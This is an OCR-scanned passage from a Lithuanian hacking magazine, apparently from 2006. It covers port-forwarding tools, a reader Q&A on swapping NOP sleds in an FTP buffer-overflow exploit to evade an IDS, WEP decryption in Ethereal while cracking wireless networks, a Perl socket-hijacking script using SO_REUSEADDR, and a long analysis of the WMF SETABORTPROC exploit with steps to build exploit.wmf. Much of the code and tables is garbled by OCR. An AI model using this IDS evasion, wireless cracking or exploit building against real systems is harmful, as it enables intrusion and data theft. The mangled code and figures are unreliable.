yra apdorojami IP adresai ir jungčių numeriai, tačiau protokolo 
tipas yra ignoruojamas, ty. įrankis nesirūpina tuo, koks srautas 
su juo yra perduodamas. Programa tiesiog veikia kaip TCP/IP 
prisijungimų kanalas. Be jokios abejonės, žymiausias įrankis 
šioje srityje yra datapipe. Ši programa yra parašyta tiek su C, 
tiek ir su Perl, todėl ją galima naudoti skirtingose platformose. 
Naudotis daiapipe nesudėtinga: ./datapipe Iocalport remoteport 
remotehost, čia localport apibrėžia lokalioje sistemoje klausomą 
jungtį, o remoteport ir remotehost nurodo, į kokia jungtį Ir tinklo 
mazgą bus nukreipti duomenys. Antrasis šios srities įrankis yra 
fpipe, kurį sukūrė kompanija foundstone. Priešingai nei datapipe, 
jis gali būti naudojamas tik Windows sistemose, ką galima laikyti 
išties dideliu trūkumu. Tiesa, ipipe pripažįsta keletą datapipe 
neprieinamų galimybių. Konkrečiau šnekant, fpipe pripažįsta 
UDP (User Datagram Protocol) protokolą, jam galima nurodyti 
darbinį tinklo sąsają bei siuntėjo jungties numerį. Be šių dviejų 
programu yra dar vienas įrankis su vartotojo sąsaja, kuris vadinasi 
Vida (Visual Interactive Datapipe: www.vidatapipe.sourceforge. 
net/). Šis įrankis pripažįsta iš karto keletą nukreipimo kanalų, 
autentifikaciją su slaptažodžiu nukreipimo atveju, per kanalą 
perduotų duomenų kiekio paskaičiavimą, duomenų snifinimą 
bei susijungimų perėmimą (hijacking). 


Su draugais lokaliame tinkle radome FTP serverį, 
kuris yra pažeidžiamas (buferio perpildymas). 
Parsisiuntėme eksploitą ir jį sukompiliavome, 
žodžiu, viską padarėme kaip priklauso. Tikrinant 
eksploito Imą su testiniu serveriu, viskas veikė tie- 
siog puikiai, o prieš mūsų rastą ftp eksploitas bejėgis, 
Pavyko sužinoti, kad jame įdiegta gudri IDS, kuri perima 
kode paliktus NOP'us. Pasiūlyk, kuo eksploito kode pa- 
keisti tuos NOP'us? 


Vietoje nop'ų puikiai tiks bet kokios asemblerio koman: 
dos, kurios nieko nedaro. Pavyzdžiui: 


mov axox ; 2 baitai 
xhg 004 ; 2 baitai 
len: by [bs] ; 2 baitai 
sl en0 4 baitai 
shrd eax,s0x,0 5 baitai 


Naudojant tokias komandas labai svarbu sekti išlyginimą (nori- 
mos pakeisti erdvės panaudojimą), kadangi jos, priešingai nei 
NOP*ai, užima daugiau nei vieną baitą. Taip pat galima priderinti 
ir registrų inkremento ir dekremento komandas: 


inc eik — padidinti 1 
dėc 6ax — sumažinti | 


Lygiai taip pat galima pasinaudoti tuo, kad daugelyje 
shellkodų darbo pradžioje registrai yra nunulinami, todėl 
galima nesibaiminant keisti registrų reikšmes su komandomis 
Inc eax — Ox40, inc ebx — 0x43, dec eax — 0x48, dec 
ebx — Ox4B, ir t.t. Šių komandų privalumas tame, kad, visų 
pirma, jos užima po vieną baitą, o antra, kad jos sutampa su 
atvaizduojamais ASCI! simboliais. Taip vietoje nop'ų galima 
panaudoti, pavyzdžiui, tokią eilutę: „HACK“, kuri sutampa su 
komandomis dec eax, inc ecx, inc ebx, dec ebx. Be abejo 
tai galima daryti su sąlyga, kad eax, ecx, ebx registrai bus 
nunulinti shellkodo pradžioje. 


8: Užsiiminėju belaidžių tinklų paieška bei 
nulaužimu ir susidūriau su klausimu: ar galima 
sniferį priversti dešifruoti web iš karto, perėmimo 
metu, jeigu aš turiu raktą? 


A: Galima. Tam pasinaudok web dešifravima 

pripažįstančiu sniferiu, pavyzdžiui, ethereal. Norėdamas 

aktyvuoti šią galimybę, užeik į Edit -> Preferences -> 

Protocols -> IEEE 802.11, į „WEP key count“ įvesk 
raktų kiekį, o į atitinkamus laukus — ir pačius raktus. 


apie socket hijacking pažeidžiamumą. '/ 
/ 


Socket hijacking pažeidžiamumo, kuris dar kitaip vadina- 
mas soketo arba serviso užgrobimu, esmė tokia. Daugelis 
servisų pagal nutylėjimą atidarydami jungtis soketą bindina 
taip, kad klausyti visų sistemoje įdiegtų sąsajų. kas su 
netstat atrodo kaip 0.0.0.0:jungtis arba *.*.*.*jungtis. 
Tai leidžia servisui apdoroti į nurodytą jungtį atėjusias užklausas 
nepriklausomai nuo mašinos tinklo sąsajos. Beje, jeigu sistemoje 
yra sukurti keli soketai, vienas kurių klausosi tam tikros jungties per 
visas sąsajas, o kitas prisijungimus priima tik per tam tikrą sąsają, 
pavyzdžiui, 192.168.0.1, bet per tą pačią jungtį kaip ir ankstes- 
nis, tai užklausai atėjus į 192.168.0.1 ji bus apdorojama su prie 
šios sąsajos pribindintu soketu, o ne su tuo, kuris klausosi visų 
sąsajų. Savaime suprantama, taip paprastai panaudoti sistemos 
jau užimtos jungties nepavyks. Norint pasiimti jau užimtą jungti, 
reikia pasinaudoti soketo opcija S0 REUSEADDR. Ji leidžia su bind 
prisirišti prie nurodytos jungties net ir tuomet, kai yra anksčiau 
užmegztų susijungimų. SO0 REUSEADDR parametras leidžia dau- 
gybei vieno ir to paties serverio egzempliorių pasileisti per vieną ir 
tą pačią jungtį, jeigu visi serverio egzemplioriai susisieja su skirtin- 
gais lokaliais IP adresais. Remiantis visomis aukščiau išsakytomis 
mintimis galima padaryti išvadą, kad jeigu SO REUSEADDR opciją 
panaudojęs atakuojantysis sukurs soketą su tam tikra sąsaja Ir 
jungtimi, kuri sutampa su sistemoje jau paleisto demono jungties 
numeriu, tai jis galės periminėti demonui siunčiamas užklausas. 
Daugelio servisų (http, ftp Ir t.t.) atveju tai nesukels jokių problemų, 
kadangi jie susisieja su privilegijuota jungtimi (mažesne už 1024), 
kurią norint panaudoti reikalingos root teisės. Iš to išplaukia, kad 
bet kuris šią jungtį bandantis užgrobti procesas taip pat reikalauja 
privilegijuoto vartotojo teisių. Daugelyje normalių operacinių sistemų 
norint panaudoti jau pribindintas neprivilegijuotas jungtis taip pat 
reikalingos vartotojo, kurio vardu paleistas veikiantis servisas, 
teisės. Visa tai yra tiesa daugelyje sistemų, tačiau ne visose. 
Pavyzdžiui, Windows sistemose jungties užgrobimas yra ganėtinai 
paprasta užduotis. Norint iliustruoti visas aukščiau išsakytas mintis, 
galima būtų pasinaudoti nedideliu per! skriptu: 


2 Uusy/hin/pel 
use: I0:Sockei: 
$|+>; 
(DARO 
print “Trying to gate saket 
Ssock — I0:Socket:-INET->new( Listen = 
Poto => Ip, LalPot ŠARGY[1J, Reuse 


2) ( print “Usage $0 <IP> <PORT>VY; ai); ) 


20, localkddr = 
=> 1) 


SARGY|OŲ, 


„ 


it(Ssock) 4 print * [DONEMY“; | 
else ( print“ (FALEDM“; oxi(); | 
while(Sdient = Ssack- > acepi) 
( 
print Sclent “Go! hucked!"; 
dose(Šclient); 


Sistemoje paleistas http serveris, kuris klausosi visų sąsajų. 


CApatl sauna > nelstat on 
Pioto Local Address 
TP 000080 00000 


Foreign Addrėss Staia 
USTENING 


Su aukščiau pateiktu skriptu sukuriame soketa, kuris veikia per 
tam tikrą konkrečią sąsają: 


CApeil source >reuse.p| 192.168.0.2 80 
Try create socket ... [DONE) 


Tuomet netstat pateikiama informacija atrodo taip: 


Proto Local Address Foreign Address Stols 
TP 000080 0.00.00  LISTENING 
TCP 192.168.0.2:80 00000 USTENING 


Dabar jeigu mes kreiptumėmės į adresą 192.168.0.2 ir 80 jungtį, 
tuomet šią užklausą perims ne http serveris, o mūsų skriptas. 
Demonstruoju: 


cA>nc 192168.0.2 80 
Got hocked! 
A 


Taip servisą/soketą perėmęs atakuojantysis tarp užgrobtos sąsajos ir 


realaus serverio gali sukurti tunelį bei išsaugoti visą per jį | abi puses 
keliaujančią informaciją. Taip galima prarasti konfidencialią informaciją. 


O) 


NARŠYKLĖSE „ATRASTAS KLAIDAS. VIENOS KLAIDOS PAVOJINGESNĖS, KITOS — NE 

TOKIOS KRITIŠKOS; KAI KURIOMS Iš JŲ GALIMA RASTI VIEŠŲ EKSPLOITŲ, KAI KURI- 
OMS EKSPLOITŲ IŠ VISO NĖRA. VIS DĖLTO VISI ŠIE PRANEŠIMAI APIE PAŽEIDŽIAMUMUS LABAI AIŠKIAI 
ATSISPINDI VIENŲ AR KITŲ NARŠYKLIŲ NAUDOJIMO STATISTIKOJE. KRUOPŠČIAI IŠANALIZAVĘ 4 METŲ 
DUOMENIS, MES SUDARĖME DIAGRAMĄ, KURI LABAI AIŠKIAI PERTEIKIA SITUACIJĄ, SUSIDARIUSIĄ 
IŠLEIDUS EILINĮ IE SKIRTĄ ŠARVAMUŠĮ EKSPLOITĄ. 


Įviešo IE skirt: 
Iremnote code O) 2 Bana | klaida, bet 
execution kokio kodo =R-TTĄ o 
lie key klaida 


Zi. 


Asiliukas ir klaidos 
0 29 BEVEIK KIEKVIENĄ DIENĄ BUGTRAO FORUMUOSE PASIRODO PRANEŠIMŲ APIE 


2002 metai 2003 metai 2004 metai 2005 metai 2006 metai — prog- 
IE 5 pakeičia šeštoji PermetusIE6.0 sparčiai Metų eigoje IE 6.0 pop- Aptikus daugybę IE 6.0  nozė 

naršyklės versija, 2002  išpopuliarėja. Šio augi- | uliarumas smarkiai nes- pažeidžiamumų, dauge- Galima nė neabejoti, kad 
metų viduryje IE 6.0tam- mo negali sustabdyti | vyruoja. Pasirodo naujų | lis vartotojų pereina prie 2006 metais IE 6.0 pakeis 
pa pačia populiariausia net daugybė atrandamų pranešimų apie klaidas. alternatyvių naršyklių 7-oji naršyklės versija. 
naršykle. Daugybė klaidų | klaidų. Populiarumas šiek tačiau vartotojų tai nejau- | pagrinde prie Firefox.2005 Taip pat pastebima Fire- 
ir kokybiškas darbas su IE tiek nukrenta tik metų  dina. Išėjus SP2, paste- metų vasarą pastebimaslE fox populiarumo augimo 
6.0 tik paspartina kartų pabaigoje, išpublikavus bimas akivaizdus pop- 6.0 populiarumoaugimas. tendencija. Kai kuriose 
pasikeitimo procesą. Alter keletą pranešimų apie  uliarumo augimas, kurį Rugsėjį, lapkritį ir gruodį šalyse šią naršyklę pasi- 


natyvios naršyklės taip pat rimtas klaidas. sulaiko nauji pranešimai Išpublikuoti pranešimai renka daugiau nei ketvirtis 
užleidžia savo pozicijas. apie klaidas pačiame apie ypač rimtas klaidas vartotojų. Manoma, kad 
pataisymų pakete. griauna IE populiarumą. | visas IE 7.0 saugumas liks 
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Viskas apie WMF ir „Windows“ istorijoje plačiausiai paplitusią klaidą 

GAL NĖ NEPASTEBĖJAI, KAD NESENIAI BUVO APTIKTA PATI STAMBIAUSIA SKYLĖ PER VISĄ 
„WINDOWS“ EGZISTAVIMO ISTORIJĄ. KLAIDA PAVEIKIA VISAS SISTEMAS NUO „WINDOWS 
3.X“ IKI „LONGHORN“ IR NET — KAS GALĖTŲ PAGALVOTI — „UNIX“! PAGAL „MCAFEE“ DU- 
OMENIS, 2006 METŲ SAUSIO 6 DIENĄ VISAME PASAULYJE BUVO UŽKRĖSTA 6 96 MAŠINŲ. 
IR TAI TIK PRADŽIA! METAS IŠSIAIŠKINTI, KAIP KIRMINAI IŠNAUDOJA NAUJĄJĄ KLAIDĄ SAVO 
PLITIMUI, KAIP JIE ĮSISKVERBIA Į SISTEMĄ IR KAIP NUO JŲ SAUGOTIS. 


WMF: metų klaida 

[2005.12.27] F-Secure duomenimis, pirmasis eksploitas pasirodė 
2005-12-27. www.unionseek.com svetainėje, kur jį tuojau pat 
priplojo kartu su visa svetaine. Tačiau džinas jau buvo išleistas iš 
butelio, eksploito kopijos pateko į internetą ir tvirtai įsikūrė www. 
metasploit.com bei milwOrm.com svetainėse, kur jis buvo prieina- 
mes kaip „ie xp piv metafile“. 


[2005.12.28] Ta pačią dieną „Microsoft“ išleido biuletenį „Vul- 
nerability in Graphics Rendering Engine Could Allow Remote Code 
Execution“, kuris oficialiai patvirtino, jog grafinėje posistemėje yra 
klaida. Deja, vietoje vaistukų MS pateikė tik pažadą iki sausio 10 
dienos išleisti pataisymą, tuo tarpu epidemijos židiniai vis augo, o 
eksploita jau buvo galima gauti net penkiose svetainėse: www.un- 
Ionseek.com, crackz.Ws, WwWw.tfcco.com, iframeurl.biz, beehappyy. 
biz, iš kurių iki mūsų dienų išgyveno tik www.tfcco.com, o visoms 
kitoms pikti administratoriai padarė harakirį be anestezijos. 


[2005.12.28] Praėjus 24 valandoms (t.y. gruodžio 28) vaikinai 
iš F-Secure jau priskaičiavo tris skirtingas eksploito modifikacijas, 
kurios buvo sąlyginai žymimos kaip W32/PFV-Exploit A, B ir C. 
Artėjančią grėsme pastebėjo ir kitos firmos. Pavyzdžiui, „McAfee“ 
aptiko du eksploitus, kurie buvo klasifikuoti kaip Down/oader-ASE 
ir Generic Downloader.ą. 


[2005.12.29] Kitą dieną, t.y. gruodžio 29, wmf kirminų atmainų 
skaičius viršijo pusę šimto, o vaistų vis dar nebuvo. „Microsoft“ 
programuotojai jau perkompiliavo GDI32.DLL, tačiau dar nespėjo 
jos ištestuoti. O eksploitai klestėjo ir dauginosi. „Microsoft“ kaip 
laikiną sprendimą (workaround) pasiūlė išregistruoti shimgw.dll 
biblioteką, kuri atsako už paveikslėlių apdorojimą Internet Explorer, 
Outlook Express, Google Desktop Search ir kai kuriose kitose 
programose, tačiau tiesiogiai su GDI sąveikaujančios programos 
(pavyzdžiui, Irfan Viewer) liko pažeidžiamos, be to, be shimgww.dll 
paveikslėliai (net ir legalūs) paprasčiausiai nebuvo atvaizduojami. 
Programa Windows Picture and Fax Viewer rodydavo tuščią ekraną, 
kuriame nebuvo galima įžiūrėti jokio optimizmo. 


[2005.12.31] Gruodžio 31, kuomet epidemija buvo ne juokais 
įsisiautėjusi, legendinį disasembleri /DA Pro sukūręs Ilfakas 
Guilfanovas išleido pataisymą (hotfix), kuris grafinės posistemės 
varikliuką užlopydavo tiesiog atmintyje, kad užuot vykdžiusi 
kenksminga callback'a ji grąžindavo klaidos pranešimą. Neilgai 
trukus dėl lankytojų antplūdžio Ilfako svetainė (www.hexblog. 
com) paprasčiausiai lūžo, o paties svetainės savininko pop- 
uliarumas išaugo kaip ant mielių. Tą pačią dieną buvo aptiktas 
pirmasis kirminas, plintantis per MSN-Messenger metafile skylę 
ir siuntinėjantis xmas-2006 FUNNY.jpg, kuris iš tiesų buvo visai 
neijpg, o pats tikriausias užkrėstas wmf, be viso kito užkrečiamoje 
mašinoje įdiegiantis backdoorą. Pagal Kasperskio Laboratorijos 
įvertinimus, 11:54 GMT IM-Worm pavadintas kirminas sugebėjo 
užgrobti 1000 mašinų (www.viruslist.com/ 
en/weblog?dicuss=1768925308retum=1), 
tačiau tai buvo dar tik žiedeliai. 


[2006.01.01] Sausio 1 dieną pasirodė pir- 
masis polimorfinis virusas, generuojantis at- 
sitiktinio dydžio metabylas su laisvai parinktu 
freimų skaičiumi ir laisvai konfigūruojamu 


užkrėstos mašinos darbastalis 


shellkodu, įkurdintu tarp freimų ir praeinančiu pro įdiegtus filtrus. 
Tada prasidėjo masinis MSN kirmino siuntinėjimas elektroniniu 
paštu, kurio antraštėje būdavo įrašyta Happy New Year. 


[2006.01.03] Kuo toliau, tuo gražiau. Sausio 3 dieną pasirodė 
kirminų konstruktorius, o po dienos hakeriai prisikasė ir iki IRC. 
Pasirodė informacija, kad Google Desktop Search disko indek- 
sacijos metu automatiškai įvykdo metabylų „turinį“. Tai reiškia, 
kad kenkėjui wmf bylą pakanka paprasčiausiai išsaugoti aukos 
kompiuteryje, ir viskas. 


[2006.01.05] Situacija darėsi kritiška, Ir sausio 5 dieną, penki- 
omis dienomis anksčiau, nei žadėta, „Microsoft“ išleido ilgai 
lauktą oficialų NT sistemoms skirtą atnaujinimą: www. microsoft. 
com/technet/security/Bulletin/ms06-001.mspx. Deja, Windows 
9x vis dar buvo neužlopyta, jau nė nekalbant apie Windows 3.x ir 
Unix tipo sistemas. 


Aticius SDK skaitymas (tik kas jį skaito!) rodo, kad kai kurios GDI 
komandos pripažįsta aigalinio iškvietimo funkcijas (kitaip vadina- 
mas callback'ais), kurioms vietoje vieno iš argumentų perduodama 
rodyklė į ką nors naudingo darančią vartotojo procedūrą (pavyzdžiui, 
apdorojančią klaidas ar kitas nestandartines situacijas). Tame 


primuštas beehappyy.biZ 


J, Your computer is infected! 
Windows has detected spyware infection! 


Click here to protect your computer From spyware! 


Microsoft Anti-Spywaro kovoja prieš wmf užkraia 
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viena iš daugelio svetainiu, kurioje galima gauti WMF olspicitą 
pačiame SDK sakoma, kad GDI komandų seka gali būti išsaugota 
metabyloje (WMF — Windows Meta File), o po to „atkurta“ bet ko- 
kiame įrenginyje, pavyzdžiui, monitoriuje arba spausdintuve. Abu šie 
atskiri faktai buvo gerai žinomi, tačiau ilgokai niekam nepavykdavo 
jų apjungti į viena visumą. Visi priprato WMF laikyti grafiniu formatu, 
kuriame saugojamas duomenų rinkinys, o galimybė įterpti mašininį 


TTT) 
p ai AL anodas mean - 


eakcija — WMF byla su oksploitu 
WMF byla su pakeistu pra; 


atvaizduojama, o shellkodas negauna valdymo: 


nu (gif) taip pat nėra atvaizduojama 


kodą kažkaip nebuvo svarstoma, atitinkamai nebuvo imamasi jokių 
apsaugos priemonių. O jeigu į metabylą įkeltume GDI komandą, 
kurilaukia rodyklės į ten pat esančią callback funkciją, tai „grojant“ 
metabylą ji gaus valdymą ir padarys viską, ko tik nori! 


[Kaip viskas prasidėjo] Metabylos atsirado dar 80 ųjų pradžioje. 
Neaišku, kam pirmam į galvą šovė mintis jas panaudoti kenksmin: 
gam kodui platinti. Teorinę tokios atakos galimybę pagrindžiau 
dar prieš penkerius metus, 0 praėjus dviems metams net patei- 
kiau veikiančio eksploito fragmentą. Tačiau mano eksploitas liko 
nepastebėtas, 0 pavojus buvo paskelbtas tik 2005 gruodžio 27 
dieną, kai ant vartotojų darbastalių ėmė rastis visokių nereikalingų 
O apsaugančios programos pradėjo gaudyti neaišku iš kur 
atsiradusius kirminus ir smarkiai keiktis. Šios programos veikė 
klasikiniu principu: jos sekė kuriamas bylas, stebėjo sisteminį 
registrą ir taip toliau, t.y. buvo gaudomas ne pats WMF turinys, 0 
„neapgalvotos“ šio turinio veiklos pasekmės. Protingai sukurptas 
shellkodas lieka nepastebėtas. 


[Kas gi tas WMF] Metabylos yra GDI komandų sekos. Windows 
grafinės posistemės požiūriu, jos yra tokie patys „įrenginiai“, kaip 
monitorius ar spausdintuvas, tačiau jeigu į monitorių/spausdintuvą 
išvedamą informaciją mes pamatome vieną kartą, tai WMF bylą 
galima „pergroti“ daug kartu, perduoti internetu ir taip toliau 
Funkcija HDC CreateMetaFile(LPCTSTR IpszFile) sukuria metabylą 
ir grąžina įrenginio, kuriame galima piešti su standartinėmis GDI 
funkcijomis (standartinės piešimo funkcijos. pavyzdžiui, LineTo arba 
Rectange), kontekstą. Funkcija PlayMetaFile (HDC hdc, HMETAFILE 
hmt) skirta su GetMetaFile (LPCTSTR IpszMetaFile) atidarytai me- 
tabylai „pergroti“, išvedant jos turinį į nurodytą įrenginį, ką galima 
padaryti štai taip: 


1 listingas: metafuilo išved | ektaną 

HDC DC HMETAFILĖ i meta; // apibiėžiam kintanvosius 
DC = GeDC(O); // gauname išvedimo konteksto 

h melo GeiMetaFile(„demo wml“); // atidarome metabylų: 
PlayNetafil(DC, h meto); // .. ir ją „pagrojan“ 
Formaliai funkcijos CreateMetaFile/PlayMetaFile/GetMetaFile laiko- 
mos pasenusiomis, tačiau jas dėl suderinamumo palaiko visos Win- 
dows sistemos. Pradedant Windows 9x, metabylų galimybės buvo 
žymiai praplėstos, atsirado naujas formatas EMF (Enhanced 
Metafile), kuris pripažino naujas funkcijas: CreateEnhMetaFile/Piay- 
EnhMetaFile/GetEngMetafile. Jos taip pat leidžia vykdyti mašininį 
kodą, todėl saugumo požiūriu abu formatai yra tolygūs. 
Metabylas apdorojančios funkcijos realizuotos GDI32.DLL bibliote- 
koje. Būtent čia ir slypi pažeidžiamumas. Shimgww.ll biblioteka 
—tai tik aukšto lygio „apvalkalas“, kai kurių programų naudojamas 
vaizdų apdorojimui, o kitos dirba tiesiogiai su GDI. 

Prie straipsnio pridedama programa, demonstruojanti pagrindinius 
darbo su metabylomis metodus. 


ĮPažeidžiamos sistemos] Savo biuletenyje (support.microsoft. 
com/kb/912840) „Microsoft“ oficialiai patvirtina šių sistemų 
pažeidžiamumą: Windows Server 2003 SPO/SP1 (Standard, 
Datacenter, Enterprise ir Web Edition), XP SPO/SP1/SP2 (Home 
ir Professional), Windows 2000 SPO/SP1/SP2/SP3/SP4 (Profes. 
sional, Advanced ir Datacenter Server) ir Windows 98/Millennium. 
Pažeidžiamos praktiškai visos platformos: x86. x64 ir Itanium. 


Gana įspūdingas sąrašas, kuriame be viso kito nepaminėta Win- 
dows 3.xir kai kurios Unix sistemos, kurios geranoriškai ir sąžiningai 
pripažįsta kenksmingąjį wmf formatą. Kitaip tariant, pranešama 
apie populiaraus emuliatoriaus wine ir MacOS pažeidžiamumą. 
Košmaras! Arba... dar viena išpūsta sensacija? Mano eksperimen- 
tai rodo, kad viskas nėra jau taip blogai. Galėjo būti dar blogiau. 
Pradėsime nuo to, jog, priešingai nei liūdnai pagarsėjusios SOL 
ir DCOM RPC skylės, WMF bylos nepalaiko automatinio kirminų 
dauginimosi. Auka turi užkrauti metabylą iš interneto ir pabandyti 
ją atvaizduoti. Labai daug kur pranešama, kad Internet Explorer ir. 
Outlook Express automatiškai „atkuria“ IMG tage nurodytas WMF 
bylas, kas yra tikra tiesa. Tačiau man pačiam nepavyko priversti 
veikti nė vieno eksploito (su W2K SP4 IE 6.0), o IE atvaizduoja 
tik praplėstas (emf) metabylas ir tai tik tas, kurių praplėtimas 
WMF/EMF, o ne gif ar jpg. 

Kalbant apie alternatyvias naršykles, Opera ir ankstesnės FireFox 
versijos (1.0.4) nepripažįsta metabylų atvaizdavimo. Jos parodo 
tuščią kvadratą, ant kurio paspaudus pasirodo dialogas, kuriame 
siūloma bylą arba išsaugoti į diską arba ją atidaryti su susieta pro- 
grama. Paprastai tokia susieta programa yra Windows Picture and 
Fax Viewer, tačiau pas mane ji neįdiegta, kadangi aš visas bylas 
peržiūrinėju su Microsoft Photo Editor (kuris nepripažįsta WMF bylų 
ir todėl nėra pažeidžiamas) arba su Irfan Viewer (pažeidžiamas NT, 
tačiau saugus 9x sistemose). Prieš tai mes jau minėjome agresyvų 
Google Desktop Search pobūdį. Vėlesnės FireFox versijos (1.5) 
metabylas atidarinėja su Windows Media Player, kuris jų nė velnio 
neatpažįsta, todėl valdymas nėra perduodamas kenksmingam 
kodui. 

Tačiau net ir „rankiniu“ būdu dirbant su GDI, reikia labai smarkiai 
pasistengti, kad įvykdytum WMF byloje saugomą kodą. Paimkime iš 
Ilfako WMF checker'io paimtą bei prie straipsnio pridedamą exploit. 
Wwmf ir pabandykime jį išvesti į ekraną su funkcija PlayMetaFile, kaip 
parodyta 1 listinge. W2K SP4 sistemoje (kitų sistemų netikrinau) 
„sažiningos“ WMF bylos išvedamos normaliai, kas patvirtina, kad 
programa parašyta teisingai, bet exploit.wmf valdymo negauna! 
Shellkodas nėra įvykdomas, o juk turėtų... Tačiau užtenka lango 
kontekstą pakeisti į specialiai sukurtos metabylos kontekstą, kaip 
į ekraną iššoka shellkodo iškviečiamas dialogo langas: 


0 CreateErhMetafile(0, 0, 0, „deme“); // peigrojam  metabylų į kitą 
metobylą 

h meta = GetMetoFile(,axploil mt“); 

PlayMetaFile(DC, h. meta); 


Opera reakcija Į WMF eksplotą siūloma metabylą atidaryti su ja susieta programa (šiuo 
atveju su ja nesusieta jokia programa) 


Windows 98 sistemoje exploit.wmf mirtinai pakabina sistemą ne- 
priklausomai nuo konteksto. Lygiai taip pat elgiasi ir kiti internete 
rasti eksploitai. Taigi pažeidžiamų platformų skaičius apsiriboja 
vien tik NT, beje, Itanium versijai reikia specialiai suprojektuoto 
shelikodo. 

Štai čia kai kurie užduoda klausimą: ar DFP (Data Execution 
Prevention) apsaugo nuo atakos. ar ne? Aparatinė DEP apsauga 
uždraudžia netyčinį mašininio kodo vykdymą duomenų srityje, 
tačiau neužkerta kelio akivaizdžiam reikiamų atributu priskyrimui 
su VirtualAlloc/VirtualProtect. Taigi visa klausimo esmė susiveda į 
tai, kokiame atminties regione viena ar kita programa užkrauna 
metabylą. 


[Ar DEP mus išgelbės?] Pabandykime tai išsiaiškinti su metabyla 
exploit.wmf ir derintuvu OllyDbg. Kad beprasmiškai netrasuotume 
kilometrų pašalinio kodo, exploit.wmf byloje sukurkime sustojimo 
tašką, prieš tai ją nukopijavę į wmF-int3.wmf (kad nesugadintume 
originalo). Atidarome metabyla su hiew, spaudžiam <F5> (goto) ir 
pereiname į poslinkį 1Ch, nuo kur, tiesą sakant, ir prasideda shel- 
Ikodas. Spaudžiam <F3> ir taip pereinam į redagavimo režimą, 
rašome CCh tol, kol neatsibos. Su <F9> išsaugome pakeitimus 
ir išeiname. 

Iš disko imame jau paruoštą bylą PlayMetaFile.exe Ir užkrauname 
ją į derintuvą, kur ją paleidžiame paspausdami <F9>. Programa 
tuojau pat nulūžta, kadangi susiduria su CCh baitų rinkiniu, kiekvi- 
enas kurių atitinka derintuvo iškviečiamą mašininę instrukciją INT 
03h. Žiūrime į EIP Jis rodo į 8B001Dh (savaime suprantama, 
kitose sistemose ši reikšmė gali būti kita). Atminties žemėlapis 
rodo, kad šios atminties srities atributai yra „Read only“. Jeigu 
aktyvuota aparatinė DEP apsauga, šioje atminties srityje nebus 
vykdomas joks kodas (programinė DEP nuo to neapsaugo). Tačiau 
pagal nutylėjimą DEP suaktyvuota tik kai kuriems sisteminiams 
servisams, O vartotojų programos gali daryti ką tik nori... Štai 
kokia situacija. 

O kaip elgiasi Irfan Viewer? Pabandykime pažiūrėti. EIP registras 
rodo į 13D31Ch ir, sprendžiant iš atminties žemėlapio, yra giliai 
steke, kurį galima tiek skaityti, tiek ir rašyti, bet tik ne vykdyti. Tai 
reiškia, kad jeigu visoms programoms suaktyvuotume DER WMF 
eksploitai neveiks. Deja, toli gražu ne visi procesoriai atpažįsta DER 
todėl atakos keliama grėsmė pakankamai aktuali, tačiau ne tokia 
didelė, kaip tai bando pateikti kai kurios antivirusus kuriančios 
kompanijos. 


[Kaip veikia žinomi eksploitai] Man žinomi eksploitai | WMF 
bylą įdiegia escape seką META ESCAPE, iškviečiančią funkciją 
SETABORTPROC, kuri savo ruožtu registruoja vartotojišką callback 
funkciją, nuo pat pradžių skirtą spausdinimo eilėje stovinčioms 
užduotims atšaukti. Tai nėra vienintelė callback'us priimanti GDI 
funkcija, yra ir kitų (tiek dokumentuotų, tiek ir nelabai, pavyzdžiui, 
LineDDA, SetICMMode), tačiau panašu į tai, kad į metabyla gali 
būti įdiegtos tik META ESCAPE/SETABORTPROC. Ar vis dėlto 
ne? GDI32.DLL disasembliavimas pateikia daugybę call reg tipo 
funkcijų, kur reg — iš WMF bylos gauta rodyklė. Kiekviena tokia 
funkcija gali tapti nauju „šventuoju graliu“ ir nauja skyle, tačiau 
ties tuo neapsistosime, kad nepalengvėtų svetimomis idėjomis 
besimaitinančių „saugumo specialistų“ darbas. Beje, hakeriai 
elgiasi lygiai taip pat: prieš kurdami savo kirminą jie preparuoja 
jau sukurtą. Mes paseksime šia mada ir išpakuosime kokį nors 
eksploitą. 
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ĮPreparuojame eksploitą] Analizei gerai tinka Ilfako Guilianovo 
WMF Exploit Checker, kurio išeities tekstą rasi mūsų diske; ten 
pat rasi ir sukompiliuotą programą. Žinok, kad tai ne koks nors 
checker, o tikrų tikriausias eksploitas, kuris į WMF bylą įterpia 
mašininį kodą ir bando į ekraną išvesti užrašą „Your system is 
vulnerable to WMF exploits!“. 

Išpakavę archyvą su išeities tekstais, mes jame rasime septynias 
bylas: 


* tellasme įdiegimui paruoštas: shellkodas; 

* wmf checker hexblog.cpp: sukuria wmf bylą, į ją“ idiegia: shellkoda ir ji „per- 
groja“; 

* wintdata.cpp: sukompiliuota tell.asm su: paruošta: Wwmf antrašte; 

* wmfhdr.wmt: wmf antraštė su escape seka ir SeiAbortProc funkcija; 


Wwmfdata.cpp yra paruošta WMF byla su shellkodu, kurį galima 
sušerti Internet Explorer, IrfanView arba bet kokiai kitai tokio tipo 
programai, tačiau prieš tai cpp reikia transformuoti į bin, kadangi 
Ilfakas dvejetainius duomenis pateikia uchar masyvo pavidalu: 


static uchar ary[] = į 
0x01,0x00,0409,0x00,0x00,0503,0xE0,0x00,0x00,0x00,0x06,0x00,0+30,0x00,0x00,0x00, 


Dabar telieka pakeisti masyvo tipą (iš uchar į char) ir į wmfdata. 
Cpp pridėti porą eilučių: 


indude <sidla.h> 

man() ( 

FILE P — Iopan(,ogplaitum“,wb'); 
funite(anoy, sizeof(anay), 1, AĮ) 


Po šito lieka tik sukompiliuoti programa su bet kokiu su ANSI 
suderinamu kompiliatoriumi ir paleisti gauta wmfdata.exe. Diske 
sukuriama byla exploit.wmf. Atidarykime ją su IrfanView arba bet 
kokiu kitu WMF bylų peržiūrai tinkamu įrankiu. Jeigu mūsų sis- 
tema pažeidžiama, tai į ekraną bus išvestas simpatiškas dialogo 
langas. 


WMF/GDI atiack 
Vector 


tipško WMF eksploito veikimo principas 


Pabandykime disasembliuoti gautą WMF bylą. Tam mums prireiks 
IDA Pro (galima apsiriboti ir hiew) bei WMF formato specifikacijos, 
kurią galima rasti mūsų diske. Metabyla susideda iš antraštės 
(standard metafile header) ir laisvai pasirinkto įrašų kiekio 
(standard metafile record). Praplėstos metabylos formatas kiek 
sudėtingesnis, tačiau mes į jį nesigilinsime. WMF bylos antraštės 
struktūra tokia: 


Metabylos antraštės struktūra 
Iypedel struct — WindowsMetaHeader 
i 


WORD Filetype; // (0 == atmintis, 1 = diskas) 
WORD HeoderSiza; // antraštės dydis žodžiais (visada 9) 
WORD Version; // reikiama Windows versija 
